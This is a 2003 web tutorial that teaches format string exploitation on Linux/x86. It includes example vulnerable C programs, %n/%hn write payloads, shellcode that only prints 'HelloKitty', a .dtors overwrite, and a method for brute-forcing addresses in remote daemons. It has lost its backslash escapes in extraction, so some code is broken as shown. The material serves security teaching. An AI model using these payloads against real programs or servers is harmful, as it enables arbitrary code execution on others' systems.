|
The
Mystery of Format String Exploitation
@
Articles -> Security ::: Programming
books and docs
Sep 12 2003, 05:50 (UTC+0) |

Format strings, and how to exploit
them!
|
rebel
writes:
The past month I've been looking alot into format strings, and
how to exploit them. It came to my attention while trying to
gain knowledge on the subject, that there are not alot of easy
to understand / straightforward papers. While most hackers are
skilled in the art of hacking, not all of them are very pedagogic
;). I wrote this text for people who want to learn what format
strings are and how to exploit insecure code, I tried to make
it easy to understand, altough some things may seem tricky at
first.
/*
* .: THE MYSTERY OF FORMAT STRING EXPLOITATION :.
* - written by
* BBBBBBBBBBBBBBBB ::: BBBBBBBBBBBBBBBB :::BBBBBBBBBBBBB ::::::
BBBBBBBBBBBBBBBBB :: BBBB :::::::::::
* BBBBBBBBBBBBBBBB : BBBBBBBBBBBBBBBBB : BBBBBBBBBBBBB ::::::
BBBBBBBBBBBBBBBBB :: BBBB :::::::::::
* BBBB BBBB : BBBB : BBBB BBBB :::::: BBBB :: BBBB :::::::::::
* BBBB ...... BBBB : BBBB ........... : BBBB ... BBBB : BBBB
.......... :: BBBB :::::::::::
* BBBBBBBBBBBBBBBB : BBBBBBBBBBBBBBBBB : BBBBBBBBBBBBBBBBB :
BBBBBBBBBBBBBBBBB :: BBBB :::::::::::
* BBBBBBBBBBBBBBBBB : BBBBBBBBBBBBBBBBB : BBBBBBBBBBBBBBBBB
: BBBBBBBBBBBBBBBBB :: BBBB :::::::::::
* BBBB BBBB : BBBB : BBBB BBBB : BBBB B :: BBBB :::::::::::
* BBBB BBBB . : BBBB ......... : BBBB .... BBBB : BBBB ...........
:: BBBB .........
* BBBB : BBBB BBB : BBBB BBBBBBBBBBB : BBBBB BBBBBB BBBB : BBBBBBBBBBBBBBBBB
:: BBBB BBBBBBBBBBB
* BBBB : BBBBBBBBB : BBBBBBBBBBBBBBBBB : BBBBBBBBBBBBBBBBB :
BBBBBBBBBBBBBBBBB :: BBBBBBBBBBBBBBBBB
*
* -
* 31/07/03 - 19:25:05
*/
---------------
-> NOTES
---------------
All the examples in this text are on the linux/x86 architecture
and it is assumed throughout the text that this is what we are
exploiting. Format strings can still be exploited on other OS's,
but it works alittle differently, in particular the shellcode
is not the same.
---------------
-> REQUIREMENTS
---------------
General C knowledge and basic knowledge about how the stack
works is very helpful. If you want to try the examples you'll
need linux, gcc, gdb and objdump. A brain might also come in
handy. So get yourself some milk & cookies and let's start.
---------------
-> WHAT ARE FORMAT STRINGS
---------------
Format strings are simply a string of characters, with special
format string identifiers. If you have programmed in C you are
familiar with functions such as printf(). Printf() takes a format
string as the first argument, and then variables which the format
string will use. Here's an example:
#include <stdio.h>
int main(void)
{
int x = 41705;
printf("x = %d, x / 2 = %d.n",x,x/2);
}
This will output "x = 41705, x / 2 = 20852". The first argument
is referred to as the format string itself, it contains characters
and format string identifiers. In this example, the '%d' identifier
was used, '%d' takes a decimal as argument, in this case it
was replaced by x, which held the integer value 41705. There
are many other format string identifiers, some of them include
%x, which is like %d but outputs in hex, %s, which takes a character
pointer and prints the string until a nullbyte is encountered
and %f, which takes a floating point number.
---------------
-> FS ABUSE
---------------
Now, how can these be abused by an attacker? Try this program:
#include <stdio.h>
int main(int argc, char *argv[])
{
printf(argv[1]);
}
This program simply prints its first argument, example:
- [root@knark] ~/research/paper > ./ex2 "Hello world."
Hello world.
- [root@knark] ~/research/paper >
Now, how is this program susceptible to attacks which can allow
attackers to execute arbitrary code you ask?
It's simple, printf(argv[1]) should be written as printf("%s",argv[1]).
If %s if forgotten or simply ignored, printf will seek format
string identifiers in the buffer itself, in this case argv[1].
Let's try something..
- [root@knark] ~/research/paper > ./ex2 "AAAA %x %x"
AAAA 401438c8 bffffc58
- [root@knark] ~/research/paper >
Uhoh, now you can probably see what's going on. printf() recognized
%x as a format string identifier, and then simply did what %x
is supposed to do, print the next 4 bytes on the stack in hex.
We can also print
whatever we want, from wherever we want. Try this:
#include <stdio.h>
int main(void)
{
char secret[]="hack.se is lame";
char buffer[512];
char target[512];
printf("secret = %pn",&secret);
fgets(buffer,512,stdin);
snprintf(target,512,buffer);
printf("%s",target);
}
- [root@knark] ~/research/paper > ./ex3
secret = 0xbffffc68
AAAA%x %x %x %x %x %x %x
AAAA4013fe20 0 0 0 41414141 33313034 30326566
- [root@knark] ~/research/paper >
As you can see, format string vulnerabilites apply to all format
string functions, in this example sprintf() has been misused.
What we do is, we first give it 'AAAA', and then proceed to
finding out how far from the
$esp our buffer lies. As we can see, after 5 '%x' we get 41414141.
This is a hex representation of AAAA, we now know that our buffer
lies 5 * 4 = 20 bytes from the esp. So, how do we get it to
print the contents of char secret[]?
Now that we know that our buffer lies 5 ´pops´ from the $esp,
we can supply an address for %s. %s takes an address as argument,
and prints whatever lies there until a nullbyte is found. We
have to supply bffffc68 to %s, since x86 is little endian, we
have to reverse it (least significant byte first).
- [root@knark] ~/research/paper > printf "\x68\xfc\xff\xbf%%5\$s"
| ./ex3
secret = 0xbffffc68
hüÿ¿hack.se is lame
- [root@knark] ~/research/paper >
tdah! %s printed out the contents of 0xbffffc68, which was char
secret[].
Ok, so now you know it's possible to print anything from anywhere
using format strings, but how is that
supposed to give you a shell?
---------------
-> WRITING
---------------
There's one format string identifier which I haven't introduced
yet, it's what makes em great, %n. %n writes the number of printed
bytes to a variable. Try this:
#include <stdio.h>
int main(void)
{
int x = 0;
printf("ABCDEFGn%n",&x);
printf("Written bytes: %dn",x);
}
- [root@knark] ~/research/paper > ./ex4
ABCDEFG
Written bytes: 8
- [root@knark] ~/research/paper >
Well well..since "ABCDEFG\n" is 8 bytes, the value 8 gets written
to the address of x. I'm sure you are beginning to see the possibilites
with this..just as we can view anything from anywhere with %s,
we can write
anything to anywhere with %n. So, let's try this out shall we?
#include <stdio.h>
int main(void)
{
int x = 5;
char buffer[52];
printf("&x = %pn",&x);
fgets(buffer,52,stdin);
printf(buffer),
printf("x = %dn",x);
}
- [root@knark] ~/research/paper > ./ex5
&x = 0xbffffc74
test
test
x = 5
- [root@knark] ~/research/paper >
We now know that x lies at 0xbffffc74, but just as %s, %n takes
an address as argument, which me must supply. Off we go to find
the stackpop:
- [root@knark] ~/research/paper > ./ex5
&x = 0xbffffc74
AAAA%x %x %x %x %x %x %x %x %x
AAAA34 4013fe20 401217f4 8049574 8049678 0 0 41414141 25207825
x = 5
- [root@knark] ~/research/paper >
Ok, as we can see, 8 is the offset. As before, we write the
format string like this:
[4 byte address]%[offset]$n
the '$' makes it take the argument number that is before '$'.
example:
#include <stdio.h>
int main(void)
{
printf("%3$d %2$d %1$d.n",1,2,3);
}
- [root@knark] ~/research/paper > ./dollah
3 2 1.
Now, back to the %n thing. &x lies at bffffc74, let's write
to it.
- [root@knark] ~/research/paper > printf "\x74\xfc\xff\xbf%%8\$n"
| ./ex5
&x = 0xbffffc74
tüÿ¿x = 4
- [root@knark] ~/research/paper >
Just like it should, x gets 4 assigned to it. If we analyze
our format string, we can see that because of the address to
x we supply which is 4 bytes, the number of bytes printed will
be 4, this value is then written to bffffc74.
---------------
-> MKAY, ME WANT SHELL
---------------
So, how can we abuse this to execute arbitrary code? In buffer
overflows we overwrite the saved return address with an address
to our shellcode, thereby executing anything we want. With format
strings it's alittle different, you can overwrite the saved
return address, but it's too much of a hazzle when exploiting
something locally. As I will explain later this is however a
very good option when doing remote format string attacks. The
simplest way of local exploitation, is to overwrite the .dtors
section of the ELF binary with an address to our shellcode.
The .dtors holds memory addresses which point to machine code
that is to be executed when the program ends. By default, it
holds nothing, but we're gonna change that.
- [root@knark] ~/research/paper > objdump -h ex5 | grep dtors
18 .dtors 00000008 08049648 08049648 00000648 2**2
- [root@knark] ~/research/paper >
From objdump, we can easily find out that DTOR_LIST is at 0x08049648,
DTOR_END, which is where we want to store our shellcode address,
is always at DTOR_LIST+4, in this case 0x804964c. Obviously,
the location
of .dtor section varies from binary to binary. Ok, now we know
the addresses to write to, where do we put the shellcode? The
easiest way
is to put it in the environment. Let's make an app that puts
an egg in the env:
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
char shellcode[]=
"x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90"
"xebx13x59x29xc0xb0x04"
"x29xdbx43x29xd2xb2x0a"
"xcdx80x29xc0x40xcdx80"
"xe8xe8xffxffxff"
"HelloKitty";
main(int argc, char *argv[]) {
setenv("EGG",shellcode,1);
system("bash");
}
This puts an "egg" in the environment which holds some shellcode
that prints "HelloKitty".
Let's move on to finding where its located:
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
printf("Egg address: %pn",getenv("EGG"));
}
- [root@knark] ~/research/paper > ./egg
- [root@knark] ~/research/paper > ./getegg
Egg address: 0xbffffdc0
- [root@knark] ~/research/paper >
Okie dokie, we now have all the information we need to craft
our very own formatstring. harhar! There are 2 main techniques
for making a format string, one is the write-1-byte-at-a-time
and the other is..you guessed it, write-2-bytes-at-a-time. How
do they differ? Well, not much really, they both do the same
thing, but the 2byte at a time one can be a bit tougher on the
cpu & memory, personally it is the one I prefer. Let's make
one!
destination: 804964c
content bffffdc0
since x86 is little endian, we write it backwards. first, we
want to write 0xfdc0(2 bytes) to 804964c, then bfff(2 bytes)
to 804964c+2(804964e).
Since we are using %n to write it all, that means we have to
use _alot_ of characters to make the internal byte counter for
%n to increase. This is not possible since not many buffers
allows storing of ~65000 bytes :). We need to trick %n, therefore
we use %.u. %.u increases the internal byte counter without
taking any real space in the buffer, therefore, printf("%.500uHello%n\n",&x)
would make x contain the value 500.
First we put the addresses we want to write to into the format
string:
- [root@knark] ~/research/paper > printf "\x4c\x96\x04\x08\x4e\x96\x04\x08"
> file
fdc0 = 64960
This is the first value we want to store. Since we have already
written 8 bytes (destination addresses), we only need to pad
with 64960 - 8 = 64952
We use %hn, not %n, since %hn writes a short, which is what
we're writing. (short = 2 bytes)
- [root@knark] ~/research/paper > echo -n "%.64952u%8\$hn" >>
file
remember that 8 is the offset to reach our buffer in the format
string.
now we have written 64960, and want to write 0xbffff(49151).
Here we run into a problem, 49151 is less than 64960 which is
what we have already written. We must do a 'rollover'. Instead
of writing 0xbfff we write 0x1bfff(114687), the "1" gets discarded
anyway and 0xbfff is all that gets written.
already written = 64960
towrite = 114687-64960=49727
- [root@knark] ~/research/paper > echo -n "%.49727u%9\$hn" >>
file
- [root@knark] ~/research/paper > cat file | ./ex5
&x = 0xbffffc44
000000000000000000....ALOT OF 0's.....
000000001075052064x = 5
HelloKitty
- [root@knark] ~/research/paper >
tdah! The shellcode got executed, printing out "HelloKitty".
As you can see, making a fully automatic local exploit is very
easy, using objdump and putting the shellcode in the env. Bruteforcing
the offset for %n is also easy. You give the target "AAAA%[n]$x",
starting at 1. If the result contains "AAAA41414141" you know
you've hit the jackpot.
---------------
-> REMOTE EXPLOITATION
---------------
I will not go into a full depth exploit example, but I will
explain my preferred method of remote format string exploitation.
As you can see, suddenly everything becomes very complicated
when it is a daemon we
are exploiting. We cannot overwrite the dtors by fidning them
with objdump, since the binary is on a remote computer. Well,
actually, we can overwrite the dtors, but only if it is the
exact same binary as one we have installed, for example an ftpd
on Redhat 9.0 would have the same .dtors address as another
computer, with a totally different setup, as long as it's running
Redhat 9.0. What can differ is the offset for %n, but it is
very easy to bruteforce. Now, what if we dont want to use
crappy hardcoded targets for our exploit? What if we want to
do it completely automatically, i.e bruteforce.
What we need is:
* 'stackpop' offset for %n
* buffer address
* saved return address
The method of finding the buffer address itself isn't that complicated.
We simply send:
[4 byte address]%%A%%|%[n]$s
Where address is bruteforced in a loop, starting from 0xbfffffff
and working it's way down, and n is the
stackpop. If we receive "%%A%%" somewhere in the output, we
know we've hit our buffers address. Here's an example:
#include <stdio.h>
int main(void)
{
char buffer[512];
bzero(&buffer,512);
printf("buffer = %p.n",&buffer);
fgets(buffer,512,stdin);
printf(buffer);
}
- [root@knark] ~/research/paper > ./ex6
buffer = 0xbffffa48.
AAAA%x %x %x %x %x %x %x %x
AAAA200 4013fe20 400124c0 40007986 40000ad8 41414141 25207825
78252078
Stackpop is 6, address of buffer is 0xbffffa48.
- [root@knark] ~/research/paper > printf "\x48\xfa\xff\xbf%%%%A%%%%|%%6\$s"
| ./ex6
buffer = 0xbffffa48.
Húÿ¿%A%|Húÿ¿%%A%%|%6$s
- [root@knark] ~/research/paper >
As we can see, %s dumps whats in our buffer. We use "%%A%%"
because, if we receive "%%A%%" we know it has not been processed
by any format string function. If that would have been the case,
we receive "%A%" since
"%%" is an escape sequence for '%' itself. When we have found
our buffer address, we can easily calculate the saved return
address. In this case, printf first pushes the saved return
address onto the stack, which we want to overwrite, then ebp,
and then buffer, which is 512 bytes.
Therefore, where the saved ret is depends on the vulnerable
function, sprintf(target,buffer); would make ret lie at &target
+ sizeof(target) + sizeof(buffer) + 4. In printf it lies at
bufaddr + 512 + 4. Therefore, in this case ret lies at 0xbffffa48
+ 512 + 4 = 0xbffffc4c
0x4141 = 16705 - 8 (remember, 4 byte address for %hn * 2) =
16697
- [root@knark] ~/research/paper > printf "\x4c\xfc\xff\xbf\x4e\xfc\xff\xbf%%.16697u%%6\$hn%%7\$hn"
> file
- [root@knark] ~/research/paper > cat file | ./ex6
buffer = 0xbffffa48.
Lüÿ¿Nüÿ¿00000000000...lotsa zeros..i mean lots..really
lots..
0000000000Segmentation fault (core dumped)
- [root@knark] ~/research/paper > gdb ./ex6 core
GNU gdb 5.3-debian
Copyright 2002 Free Software Foundation, Inc.
Core was generated by `./ex6'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...(no debugging symbols
found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb)
chaching! we overwrote the saved return address with 0x41414141!
As you can see, remote format string exploitation can be a bit
tricky, altough not impossible.
I came up with a nice method for speeding up the bufaddr bruteforcing
(significantly) while tinkering with an exploit. The technique
goes like this: By utilizing ascii codes, we can make a sort
of 'pillow' for us to land in, just like with NOP's in buffer
overflows. Altough it's not as straightforward. We first send
4 bytes of addresses for %s, just like normal. Then we send
as many ascii characters as we can fit into the target buffer,
the optimal amount is about ~90. What we do is, we simply start
at one char/number. A good one is ASCII = 38/char = &. After
that we move up the ascii ladder, by sending ASCII = 39/char
= ' and so on. Each character acts as a number of indication,
where we have hit in the buffer. So, if we start at ascii 38,
the location of bufaddr is always:
[ascii of current location (for example, ASCII = 42/char = *)]
- 38 (since we start at 38/& - 4 (the address is 4 bytes).
After we stuff in our ascii chars, we put "%%A%%|%[n]s", where
n is the stackpop. With this, we can then determine if we've
hit the buffer at all by doing a strstr(result,"%%A%%|");
If it does exist, we know we've hit the buffer, and can do a
simple calculation of the start by analyzing the current character.
Using this method we can use jumps of [frame]/2 . Where frame
is how many ascii characters you've stuffed in the buffer.
---------------
-> BUHBYE
---------------
That's all from me, I hope you enjoyed the text and learned
something. If you have any suggestions/comments you can contact
me at rebel@bonbon.net. You can also catch me on irc, rebel^@EFnet
and rebel@freenode.
Cherio, tata and good luck!
greets: dvdman, dcryptr, RAk, freestyler, nebunu, ntrude, m0lted(ascii
dood), xmb, norse, zarwt, q\, suspect
. . .
|
|
|